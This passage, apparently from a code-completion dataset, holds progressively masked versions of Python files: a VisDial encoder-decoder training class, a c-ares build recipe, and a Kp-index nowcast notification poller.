lr=self.\n hparams.initial_lr)\n self.scheduler = lr_scheduler.LambdaLR(self.optimizer,\n lr_lambda=lr_lambda_fun)\n else:\n raise NotImplementedError\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Build Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def 
_setup_training(self):\n if self.hparams.save_dirpath == 'checkpoints/':\n self.save_dirpath = os.path.join(self.hparams.root_dir, self.\n hparams.save_dirpath)\n self.summary_writer = SummaryWriter(self.save_dirpath)\n self.checkpoint_manager = CheckpointManager(self.model, self.\n optimizer, self.save_dirpath, hparams=self.hparams)\n if self.hparams.load_pthpath == '':\n self.start_epoch = 1\n else:\n self.start_epoch = int(self.hparams.load_pthpath.split('_')[-1]\n [:-4])\n self.start_epoch += 1\n model_state_dict, optimizer_state_dict = load_checkpoint(self.\n hparams.load_pthpath)\n if isinstance(self.model, nn.DataParallel):\n self.model.module.load_state_dict(model_state_dict)\n else:\n self.model.load_state_dict(model_state_dict)\n self.optimizer.load_state_dict(optimizer_state_dict)\n self.previous_model_path = self.hparams.load_pthpath\n print('Loaded model from {}'.format(self.hparams.load_pthpath))\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Setup Training Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _loss_fn(self, epoch, batch, output):\n target = batch['ans_ind'] if 'disc' in self.hparams.decoder else batch[\n 'ans_out']\n batch_loss = self.criterion(output.view(-1, output.size(-1)),\n target.view(-1).to(self.device))\n return batch_loss\n\n def train(self):\n self._build_dataloader()\n self._build_model()\n self._setup_training()\n evaluation = Evaluation(self.hparams, model=self.model, split='val')\n global_iteration_step = (self.start_epoch - 1) * self.iterations\n running_loss = 0.0\n train_begin = datetime.utcnow()\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Train Starts (NEW)\n # -------------------------------------------------------------------------\n \"\"\"\n )\n for epoch in range(self.start_epoch, self.hparams.num_epochs):\n self.model.train()\n 
combined_dataloader = itertools.chain(self.train_dataloader)\n print(f'\\nTraining for epoch {epoch}:', 'Total Iter:', self.\n iterations)\n tqdm_batch_iterator = tqdm(combined_dataloader)\n accumulate_batch = 0\n for i, batch in enumerate(tqdm_batch_iterator):\n buffer_batch = batch.copy()\n for key in batch:\n buffer_batch[key] = buffer_batch[key].to(self.device)\n output = self.model(buffer_batch)\n batch_loss = self._loss_fn(epoch, batch, output)\n batch_loss.backward()\n accumulate_batch += batch['img_ids'].shape[0]\n if (self.hparams.virtual_batch_size == accumulate_batch or \n i == len(self.train_dataset) // self.hparams.\n train_batch_size):\n self.optimizer.step()\n if running_loss > 0.0:\n running_loss = (0.95 * running_loss + 0.05 *\n batch_loss.item())\n else:\n running_loss = batch_loss.item()\n self.optimizer.zero_grad()\n accumulate_batch = 0\n self.scheduler.step(global_iteration_step)\n global_iteration_step += 1\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.optimizer\n .param_groups[0]['lr']))\n tqdm_batch_iterator.set_description(description)\n if (global_iteration_step % self.hparams.\n tensorboard_step == 0):\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.\n optimizer.param_groups[0]['lr']))\n self._logger.info(description)\n self.summary_writer.add_scalar('train/loss',\n batch_loss, global_iteration_step)\n self.summary_writer.add_scalar('train/lr', self.\n optimizer.param_groups[0]['lr'],\n global_iteration_step)\n self.checkpoint_manager.step(epoch)\n self.previous_model_path = os.path.join(self.checkpoint_manager\n .ckpt_dirpath, 'checkpoint_%d.pth' % epoch)\n self._logger.info(self.previous_model_path)\n if (epoch < self.hparams.num_epochs - 1 and self.hparams.\n dataset_version == '0.9'):\n 
continue\n torch.cuda.empty_cache()\n evaluation.run_evaluate(self.previous_model_path,\n global_iteration_step, self.summary_writer, os.path.join(\n self.checkpoint_manager.ckpt_dirpath, 'ranks_%d_valid.json' %\n epoch))\n torch.cuda.empty_cache()\n return self.previous_model_path\n",
"step-4": "<mask token>\nos.environ['CUDA_VISIBLE_DEVICES'] = '0,1'\n<mask token>\n\n\nclass MVAN(object):\n\n def __init__(self, hparams):\n self.hparams = hparams\n self._logger = logging.getLogger(__name__)\n np.random.seed(hparams.random_seed[0])\n torch.manual_seed(hparams.random_seed[0])\n torch.cuda.manual_seed_all(hparams.random_seed[0])\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n self.device = torch.device('cuda', self.hparams.gpu_ids[0]\n ) if self.hparams.gpu_ids[0] >= 0 else torch.device('cpu')\n setproctitle(hparams.dataset_version + '_' + hparams.model_name +\n '_' + str(hparams.random_seed[0]))\n\n def _build_dataloader(self):\n old_split = 'train' if self.hparams.dataset_version == '0.9' else None\n self.train_dataset = VisDialDataset(self.hparams, overfit=self.\n hparams.overfit, split='train', old_split=old_split)\n collate_fn = None\n if 'dan' in self.hparams.img_feature_type:\n collate_fn = self.train_dataset.collate_fn\n self.train_dataloader = DataLoader(self.train_dataset, batch_size=\n self.hparams.train_batch_size, num_workers=self.hparams.\n cpu_workers, shuffle=True, drop_last=True, collate_fn=collate_fn)\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # DATALOADER FINISHED\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _build_model(self):\n print('\\t* Building model...')\n encoder = Encoder(self.hparams, self.train_dataset.vocabulary)\n decoder = Decoder(self.hparams, self.train_dataset.vocabulary)\n print('Encoder: {}'.format(self.hparams.encoder))\n print('Decoder: {}'.format(self.hparams.decoder))\n if self.hparams.glove_npy != '':\n encoder.word_embed.weight.data = torch.from_numpy(np.load(self.\n hparams.glove_npy))\n print('Loaded glove vectors from {}'.format(self.hparams.glove_npy)\n )\n decoder.word_embed = encoder.word_embed\n self.model = EncoderDecoderModel(encoder, decoder)\n 
self.model = self.model.to(self.device)\n if -1 not in self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:\n self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)\n if 'disc' in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss()\n elif 'gen' in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss(ignore_index=self.\n train_dataset.vocabulary.PAD_INDEX)\n if self.hparams.training_splits == 'trainval':\n self.iterations = (len(self.train_dataset) + len(self.\n valid_dataset)) // self.hparams.virtual_batch_size\n else:\n self.iterations = len(self.train_dataset\n ) // self.hparams.virtual_batch_size\n\n def lr_lambda_fun(current_iteration: int) ->float:\n \"\"\"Returns a learning rate multiplier.\n\n Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,\n and then gets multiplied by `lr_gamma` every time a milestone is crossed.\n \"\"\"\n current_epoch = float(current_iteration) / self.iterations\n if current_epoch <= self.hparams.warmup_epochs:\n alpha = current_epoch / float(self.hparams.warmup_epochs)\n return self.hparams.warmup_factor * (1.0 - alpha) + alpha\n else:\n return_val = 1.0\n if current_epoch >= self.hparams.lr_milestones[0\n ] and current_epoch < self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones, current_epoch)\n return_val = pow(self.hparams.lr_gamma, idx)\n elif current_epoch >= self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones2, current_epoch)\n return_val = self.hparams.lr_gamma * pow(self.hparams.\n lr_gamma2, idx)\n return return_val\n if self.hparams.lr_scheduler == 'LambdaLR':\n self.optimizer = optim.Adam(self.model.parameters(), lr=self.\n hparams.initial_lr)\n self.scheduler = lr_scheduler.LambdaLR(self.optimizer,\n lr_lambda=lr_lambda_fun)\n else:\n raise NotImplementedError\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Build Finished\n # 
-------------------------------------------------------------------------\n \"\"\"\n )\n\n def _setup_training(self):\n if self.hparams.save_dirpath == 'checkpoints/':\n self.save_dirpath = os.path.join(self.hparams.root_dir, self.\n hparams.save_dirpath)\n self.summary_writer = SummaryWriter(self.save_dirpath)\n self.checkpoint_manager = CheckpointManager(self.model, self.\n optimizer, self.save_dirpath, hparams=self.hparams)\n if self.hparams.load_pthpath == '':\n self.start_epoch = 1\n else:\n self.start_epoch = int(self.hparams.load_pthpath.split('_')[-1]\n [:-4])\n self.start_epoch += 1\n model_state_dict, optimizer_state_dict = load_checkpoint(self.\n hparams.load_pthpath)\n if isinstance(self.model, nn.DataParallel):\n self.model.module.load_state_dict(model_state_dict)\n else:\n self.model.load_state_dict(model_state_dict)\n self.optimizer.load_state_dict(optimizer_state_dict)\n self.previous_model_path = self.hparams.load_pthpath\n print('Loaded model from {}'.format(self.hparams.load_pthpath))\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Setup Training Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _loss_fn(self, epoch, batch, output):\n target = batch['ans_ind'] if 'disc' in self.hparams.decoder else batch[\n 'ans_out']\n batch_loss = self.criterion(output.view(-1, output.size(-1)),\n target.view(-1).to(self.device))\n return batch_loss\n\n def train(self):\n self._build_dataloader()\n self._build_model()\n self._setup_training()\n evaluation = Evaluation(self.hparams, model=self.model, split='val')\n global_iteration_step = (self.start_epoch - 1) * self.iterations\n running_loss = 0.0\n train_begin = datetime.utcnow()\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Train Starts (NEW)\n # -------------------------------------------------------------------------\n \"\"\"\n )\n for 
epoch in range(self.start_epoch, self.hparams.num_epochs):\n self.model.train()\n combined_dataloader = itertools.chain(self.train_dataloader)\n print(f'\\nTraining for epoch {epoch}:', 'Total Iter:', self.\n iterations)\n tqdm_batch_iterator = tqdm(combined_dataloader)\n accumulate_batch = 0\n for i, batch in enumerate(tqdm_batch_iterator):\n buffer_batch = batch.copy()\n for key in batch:\n buffer_batch[key] = buffer_batch[key].to(self.device)\n output = self.model(buffer_batch)\n batch_loss = self._loss_fn(epoch, batch, output)\n batch_loss.backward()\n accumulate_batch += batch['img_ids'].shape[0]\n if (self.hparams.virtual_batch_size == accumulate_batch or \n i == len(self.train_dataset) // self.hparams.\n train_batch_size):\n self.optimizer.step()\n if running_loss > 0.0:\n running_loss = (0.95 * running_loss + 0.05 *\n batch_loss.item())\n else:\n running_loss = batch_loss.item()\n self.optimizer.zero_grad()\n accumulate_batch = 0\n self.scheduler.step(global_iteration_step)\n global_iteration_step += 1\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.optimizer\n .param_groups[0]['lr']))\n tqdm_batch_iterator.set_description(description)\n if (global_iteration_step % self.hparams.\n tensorboard_step == 0):\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.\n optimizer.param_groups[0]['lr']))\n self._logger.info(description)\n self.summary_writer.add_scalar('train/loss',\n batch_loss, global_iteration_step)\n self.summary_writer.add_scalar('train/lr', self.\n optimizer.param_groups[0]['lr'],\n global_iteration_step)\n self.checkpoint_manager.step(epoch)\n self.previous_model_path = os.path.join(self.checkpoint_manager\n .ckpt_dirpath, 'checkpoint_%d.pth' % epoch)\n self._logger.info(self.previous_model_path)\n if 
(epoch < self.hparams.num_epochs - 1 and self.hparams.\n dataset_version == '0.9'):\n continue\n torch.cuda.empty_cache()\n evaluation.run_evaluate(self.previous_model_path,\n global_iteration_step, self.summary_writer, os.path.join(\n self.checkpoint_manager.ckpt_dirpath, 'ranks_%d_valid.json' %\n epoch))\n torch.cuda.empty_cache()\n return self.previous_model_path\n",
"step-5": "import os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0,1\"\nimport logging\nimport itertools\n\nimport torch\nfrom torch import nn, optim\nfrom torch.optim import lr_scheduler\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom tqdm import tqdm\nfrom setproctitle import setproctitle\nfrom bisect import bisect\n\nfrom datetime import datetime\nimport numpy as np\n\nfrom data.dataset import VisDialDataset\nfrom visdial.encoders import Encoder\nfrom visdial.decoders import Decoder\nfrom visdial.model import EncoderDecoderModel\nfrom visdial.utils.checkpointing import CheckpointManager, load_checkpoint\n\nfrom single_evaluation import Evaluation\n\nclass MVAN(object):\n def __init__(self, hparams):\n self.hparams = hparams\n self._logger = logging.getLogger(__name__)\n\n np.random.seed(hparams.random_seed[0])\n torch.manual_seed(hparams.random_seed[0])\n torch.cuda.manual_seed_all(hparams.random_seed[0])\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n\n self.device = (\n torch.device(\"cuda\", self.hparams.gpu_ids[0])\n if self.hparams.gpu_ids[0] >= 0\n else torch.device(\"cpu\")\n )\n setproctitle(hparams.dataset_version + '_' + hparams.model_name + '_' + str(hparams.random_seed[0]))\n\n # def _build_data_process(self):\n def _build_dataloader(self):\n # =============================================================================\n # SETUP DATASET, DATALOADER\n # =============================================================================\n old_split = \"train\" if self.hparams.dataset_version == \"0.9\" else None\n self.train_dataset = VisDialDataset(\n self.hparams,\n overfit=self.hparams.overfit,\n split=\"train\",\n old_split = old_split\n )\n\n collate_fn = None\n if \"dan\" in self.hparams.img_feature_type:\n collate_fn = self.train_dataset.collate_fn\n\n self.train_dataloader = DataLoader(\n self.train_dataset,\n batch_size=self.hparams.train_batch_size,\n 
num_workers=self.hparams.cpu_workers,\n shuffle=True,\n drop_last=True,\n collate_fn=collate_fn,\n )\n\n print(\"\"\"\n # -------------------------------------------------------------------------\n # DATALOADER FINISHED\n # -------------------------------------------------------------------------\n \"\"\")\n\n def _build_model(self):\n\n # =============================================================================\n # MODEL : Encoder, Decoder\n # =============================================================================\n\n print('\\t* Building model...')\n # Pass vocabulary to construct Embedding layer.\n encoder = Encoder(self.hparams, self.train_dataset.vocabulary)\n decoder = Decoder(self.hparams, self.train_dataset.vocabulary)\n\n print(\"Encoder: {}\".format(self.hparams.encoder))\n print(\"Decoder: {}\".format(self.hparams.decoder))\n\n # New: Initializing word_embed using GloVe\n if self.hparams.glove_npy != '':\n encoder.word_embed.weight.data = torch.from_numpy(np.load(self.hparams.glove_npy))\n print(\"Loaded glove vectors from {}\".format(self.hparams.glove_npy))\n # Share word embedding between encoder and decoder.\n decoder.word_embed = encoder.word_embed\n\n # Wrap encoder and decoder in a model.\n self.model = EncoderDecoderModel(encoder, decoder)\n self.model = self.model.to(self.device)\n # Use Multi-GPUs\n if -1 not in self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:\n self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)\n\n # =============================================================================\n # CRITERION\n # =============================================================================\n if \"disc\" in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss()\n\n elif \"gen\" in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss(ignore_index=self.train_dataset.vocabulary.PAD_INDEX)\n\n # Total Iterations -> for learning rate scheduler\n if self.hparams.training_splits == \"trainval\":\n 
self.iterations = (len(self.train_dataset) + len(self.valid_dataset)) // self.hparams.virtual_batch_size\n else:\n self.iterations = len(self.train_dataset) // self.hparams.virtual_batch_size\n\n # =============================================================================\n # OPTIMIZER, SCHEDULER\n # =============================================================================\n\n def lr_lambda_fun(current_iteration: int) -> float:\n \"\"\"Returns a learning rate multiplier.\n\n Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,\n and then gets multiplied by `lr_gamma` every time a milestone is crossed.\n \"\"\"\n current_epoch = float(current_iteration) / self.iterations\n if current_epoch <= self.hparams.warmup_epochs:\n alpha = current_epoch / float(self.hparams.warmup_epochs)\n return self.hparams.warmup_factor * (1.0 - alpha) + alpha\n else:\n return_val = 1.0\n if current_epoch >= self.hparams.lr_milestones[0] and current_epoch < self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones, current_epoch)\n return_val = pow(self.hparams.lr_gamma, idx)\n elif current_epoch >= self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones2, current_epoch)\n return_val = self.hparams.lr_gamma * pow(self.hparams.lr_gamma2, idx)\n return return_val\n\n if self.hparams.lr_scheduler == \"LambdaLR\":\n self.optimizer = optim.Adam(self.model.parameters(), lr=self.hparams.initial_lr)\n self.scheduler = lr_scheduler.LambdaLR(self.optimizer, lr_lambda=lr_lambda_fun)\n else:\n raise NotImplementedError\n\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Build Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _setup_training(self):\n if self.hparams.save_dirpath == 'checkpoints/':\n self.save_dirpath = os.path.join(self.hparams.root_dir, self.hparams.save_dirpath)\n self.summary_writer = 
SummaryWriter(self.save_dirpath)\n self.checkpoint_manager = CheckpointManager(\n self.model, self.optimizer, self.save_dirpath, hparams=self.hparams\n )\n\n # If loading from checkpoint, adjust start epoch and load parameters.\n if self.hparams.load_pthpath == \"\":\n self.start_epoch = 1\n else:\n # \"path/to/checkpoint_xx.pth\" -> xx\n self.start_epoch = int(self.hparams.load_pthpath.split(\"_\")[-1][:-4])\n self.start_epoch += 1\n model_state_dict, optimizer_state_dict = load_checkpoint(self.hparams.load_pthpath)\n if isinstance(self.model, nn.DataParallel):\n self.model.module.load_state_dict(model_state_dict)\n else:\n self.model.load_state_dict(model_state_dict)\n self.optimizer.load_state_dict(optimizer_state_dict)\n self.previous_model_path = self.hparams.load_pthpath\n print(\"Loaded model from {}\".format(self.hparams.load_pthpath))\n\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Setup Training Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _loss_fn(self, epoch, batch, output):\n target = (batch[\"ans_ind\"] if \"disc\" in self.hparams.decoder else batch[\"ans_out\"])\n batch_loss = self.criterion(output.view(-1, output.size(-1)), target.view(-1).to(self.device))\n\n return batch_loss\n\n def train(self):\n\n self._build_dataloader()\n self._build_model()\n self._setup_training()\n\n # Evaluation Setup\n evaluation = Evaluation(self.hparams, model=self.model, split=\"val\")\n\n # Forever increasing counter to keep track of iterations (for tensorboard log).\n global_iteration_step = (self.start_epoch - 1) * self.iterations\n\n running_loss = 0.0 # New\n train_begin = datetime.utcnow() # New\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Train Starts (NEW)\n # -------------------------------------------------------------------------\n \"\"\"\n )\n for epoch in range(self.start_epoch, 
self.hparams.num_epochs):\n self.model.train()\n # -------------------------------------------------------------------------\n # ON EPOCH START (combine dataloaders if training on train + val)\n # -------------------------------------------------------------------------\n combined_dataloader = itertools.chain(self.train_dataloader)\n\n print(f\"\\nTraining for epoch {epoch}:\", \"Total Iter:\", self.iterations)\n tqdm_batch_iterator = tqdm(combined_dataloader)\n accumulate_batch = 0 # taesun New\n\n for i, batch in enumerate(tqdm_batch_iterator):\n buffer_batch = batch.copy()\n for key in batch:\n buffer_batch[key] = buffer_batch[key].to(self.device)\n\n output = self.model(buffer_batch)\n batch_loss = self._loss_fn(epoch, batch, output)\n batch_loss.backward()\n\n accumulate_batch += batch[\"img_ids\"].shape[0]\n if self.hparams.virtual_batch_size == accumulate_batch \\\n or i == (len(self.train_dataset) // self.hparams.train_batch_size): # last batch\n\n self.optimizer.step()\n\n # --------------------------------------------------------------------\n # Update running loss and decay learning rates\n # --------------------------------------------------------------------\n if running_loss > 0.0:\n running_loss = 0.95 * running_loss + 0.05 * batch_loss.item()\n else:\n running_loss = batch_loss.item()\n\n self.optimizer.zero_grad()\n accumulate_batch = 0\n\n self.scheduler.step(global_iteration_step)\n\n global_iteration_step += 1\n # torch.cuda.empty_cache()\n description = \"[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]\".format(\n datetime.utcnow() - train_begin,\n epoch,\n global_iteration_step, running_loss,\n self.optimizer.param_groups[0]['lr'])\n tqdm_batch_iterator.set_description(description)\n\n # tensorboard\n if global_iteration_step % self.hparams.tensorboard_step == 0:\n description = \"[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]\".format(\n datetime.utcnow() - train_begin,\n epoch,\n global_iteration_step, running_loss,\n 
self.optimizer.param_groups[0]['lr'],\n )\n self._logger.info(description)\n # tensorboard writing scalar\n self.summary_writer.add_scalar(\n \"train/loss\", batch_loss, global_iteration_step\n )\n self.summary_writer.add_scalar(\n \"train/lr\", self.optimizer.param_groups[0][\"lr\"], global_iteration_step\n )\n\n # -------------------------------------------------------------------------\n # ON EPOCH END (checkpointing and validation)\n # -------------------------------------------------------------------------\n self.checkpoint_manager.step(epoch)\n self.previous_model_path = os.path.join(self.checkpoint_manager.ckpt_dirpath, \"checkpoint_%d.pth\" % (epoch))\n self._logger.info(self.previous_model_path)\n\n if epoch < self.hparams.num_epochs - 1 and self.hparams.dataset_version == '0.9':\n continue\n\n torch.cuda.empty_cache()\n evaluation.run_evaluate(self.previous_model_path, global_iteration_step, self.summary_writer,\n os.path.join(self.checkpoint_manager.ckpt_dirpath, \"ranks_%d_valid.json\" % epoch))\n torch.cuda.empty_cache()\n\n return self.previous_model_path",
"step-ids": [
4,
6,
7,
8,
10
]
}
|
[
4,
6,
7,
8,
10
] |
from .base import GnuRecipe
class CAresRecipe(GnuRecipe):
    """Build recipe for c-ares, the asynchronous DNS resolver library."""

    def __init__(self, *args, **kwargs):
        super(CAresRecipe, self).__init__(*args, **kwargs)
        self.name = 'c-ares'
        self.version = '1.14.0'
        # SHA-256 of the release tarball, used to verify the download.
        self.sha256 = ('45d3c1fd29263ceec2afc8ff9cd06d5f'
                       '8f889636eb4e80ce3cc7f0eaf7aadc6e')
        # NOTE(review): $name/$version are presumably expanded by the base
        # recipe machinery -- confirm against GnuRecipe.
        self.url = 'https://c-ares.haxx.se/download/$name-$version.tar.gz'
|
normal
|
{
"blob_id": "bf7676dc2c47d9cd2f1ce2d436202ae2c5061265",
"index": 8634,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass CAresRecipe(GnuRecipe):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass CAresRecipe(GnuRecipe):\n\n def __init__(self, *args, **kwargs):\n super(CAresRecipe, self).__init__(*args, **kwargs)\n self.sha256 = (\n '45d3c1fd29263ceec2afc8ff9cd06d5f8f889636eb4e80ce3cc7f0eaf7aadc6e')\n self.name = 'c-ares'\n self.version = '1.14.0'\n self.url = 'https://c-ares.haxx.se/download/$name-$version.tar.gz'\n",
"step-4": "from .base import GnuRecipe\n\n\nclass CAresRecipe(GnuRecipe):\n\n def __init__(self, *args, **kwargs):\n super(CAresRecipe, self).__init__(*args, **kwargs)\n self.sha256 = (\n '45d3c1fd29263ceec2afc8ff9cd06d5f8f889636eb4e80ce3cc7f0eaf7aadc6e')\n self.name = 'c-ares'\n self.version = '1.14.0'\n self.url = 'https://c-ares.haxx.se/download/$name-$version.tar.gz'\n",
"step-5": "from .base import GnuRecipe\n\n\nclass CAresRecipe(GnuRecipe):\n def __init__(self, *args, **kwargs):\n super(CAresRecipe, self).__init__(*args, **kwargs)\n self.sha256 = '45d3c1fd29263ceec2afc8ff9cd06d5f' \\\n '8f889636eb4e80ce3cc7f0eaf7aadc6e'\n self.name = 'c-ares'\n self.version = '1.14.0'\n self.url = 'https://c-ares.haxx.se/download/$name-$version.tar.gz'\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import calendar
import json
from datetime import datetime
from datapoller.download import download
from datapoller.settings import *
from messaging.Messaging import sendMessage
from messaging.settings import RABBIT_NOTIFY_QUEUE
from sessioncontroller.utils import is_level_interesting_for_kp
__author__ = 'arik'
sharedDict = {}
def registerModelStorage(dict):
    """Install *dict* as the module-wide shared model storage.

    All readers in this module (``updateModel``, ``hasValidModel``,
    ``processUserLocation``) look the model up through ``sharedDict``.

    NOTE(review): the parameter name shadows the built-in ``dict``;
    renaming it would change the keyword-call interface, so it is kept.
    """
    global sharedDict
    sharedDict = dict
def updateModel():
    """Refresh the shared model from the nowcast feed.

    Downloads the latest level data together with its validity timestamp
    from ``NOWCAST_DATA_URL`` and publishes both into ``sharedDict``.
    """
    levels, valid_until = download(NOWCAST_DATA_URL)
    sharedDict['lastLevels'] = levels
    sharedDict['validTime'] = valid_until
def hasValidModel():
    """Return True when a model is loaded and its validity time has not passed."""
    levels = sharedDict.get('lastLevels')
    valid_until = sharedDict.get('validTime')
    # No model downloaded yet -> nothing to serve.
    if levels is None or valid_until is None:
        return False
    # Model is usable while its valid-time is still in the future (UTC).
    return getTimestamp(valid_until) >= getTimestamp(datetime.utcnow())
def processUserLocation(geo_id, geo, kp_level, chat_id, bot):
    """Queue a notification for one subscribed user location.

    Does nothing unless a valid (non-expired) model is loaded.  A message
    is sent when the user has no Kp threshold configured (``kp_level`` is
    None) or when the current level is interesting for that threshold.
    """
    if not hasValidModel():
        return
    valid_until = sharedDict.get('validTime')
    level = sharedDict.get('lastLevels')[geo_id]
    # Skip users whose configured threshold filters this level out.
    if kp_level is not None and not is_level_interesting_for_kp(level, kp_level):
        return
    payload = json.dumps({
        "time": getTimestamp(valid_until),
        "geo": geo,
        "chat_id": chat_id,
        "level": level,
        "bot": bot,
    })
    sendMessage(RABBIT_NOTIFY_QUEUE, payload)
def getTimestamp(datetime):
    """Return the POSIX timestamp (seconds) for a naive UTC ``datetime``.

    NOTE(review): the parameter shadows the ``datetime`` class imported at
    module level; only the passed-in instance is used inside this function.
    """
    utc_struct = datetime.timetuple()
    return calendar.timegm(utc_struct)
|
normal
|
{
"blob_id": "e8f090a02bfd5ee8a6832351357594af2d6692f9",
"index": 8702,
"step-1": "<mask token>\n\n\ndef registerModelStorage(dict):\n global sharedDict\n sharedDict = dict\n\n\ndef updateModel():\n lastLevels, validTime = download(NOWCAST_DATA_URL)\n sharedDict['lastLevels'] = lastLevels\n sharedDict['validTime'] = validTime\n\n\n<mask token>\n\n\ndef getTimestamp(datetime):\n return calendar.timegm(datetime.timetuple())\n",
"step-2": "<mask token>\n\n\ndef registerModelStorage(dict):\n global sharedDict\n sharedDict = dict\n\n\ndef updateModel():\n lastLevels, validTime = download(NOWCAST_DATA_URL)\n sharedDict['lastLevels'] = lastLevels\n sharedDict['validTime'] = validTime\n\n\n<mask token>\n\n\ndef processUserLocation(geo_id, geo, kp_level, chat_id, bot):\n if hasValidModel() is False:\n return\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n level = lastLevels[geo_id]\n if kp_level is None or is_level_interesting_for_kp(level, kp_level):\n sendMessage(RABBIT_NOTIFY_QUEUE, json.dumps({'time': getTimestamp(\n validTime), 'geo': geo, 'chat_id': chat_id, 'level': level,\n 'bot': bot}))\n\n\ndef getTimestamp(datetime):\n return calendar.timegm(datetime.timetuple())\n",
"step-3": "<mask token>\n\n\ndef registerModelStorage(dict):\n global sharedDict\n sharedDict = dict\n\n\ndef updateModel():\n lastLevels, validTime = download(NOWCAST_DATA_URL)\n sharedDict['lastLevels'] = lastLevels\n sharedDict['validTime'] = validTime\n\n\ndef hasValidModel():\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n return lastLevels is not None and validTime is not None and getTimestamp(\n validTime) >= getTimestamp(datetime.utcnow())\n\n\ndef processUserLocation(geo_id, geo, kp_level, chat_id, bot):\n if hasValidModel() is False:\n return\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n level = lastLevels[geo_id]\n if kp_level is None or is_level_interesting_for_kp(level, kp_level):\n sendMessage(RABBIT_NOTIFY_QUEUE, json.dumps({'time': getTimestamp(\n validTime), 'geo': geo, 'chat_id': chat_id, 'level': level,\n 'bot': bot}))\n\n\ndef getTimestamp(datetime):\n return calendar.timegm(datetime.timetuple())\n",
"step-4": "<mask token>\n__author__ = 'arik'\nsharedDict = {}\n\n\ndef registerModelStorage(dict):\n global sharedDict\n sharedDict = dict\n\n\ndef updateModel():\n lastLevels, validTime = download(NOWCAST_DATA_URL)\n sharedDict['lastLevels'] = lastLevels\n sharedDict['validTime'] = validTime\n\n\ndef hasValidModel():\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n return lastLevels is not None and validTime is not None and getTimestamp(\n validTime) >= getTimestamp(datetime.utcnow())\n\n\ndef processUserLocation(geo_id, geo, kp_level, chat_id, bot):\n if hasValidModel() is False:\n return\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n level = lastLevels[geo_id]\n if kp_level is None or is_level_interesting_for_kp(level, kp_level):\n sendMessage(RABBIT_NOTIFY_QUEUE, json.dumps({'time': getTimestamp(\n validTime), 'geo': geo, 'chat_id': chat_id, 'level': level,\n 'bot': bot}))\n\n\ndef getTimestamp(datetime):\n return calendar.timegm(datetime.timetuple())\n",
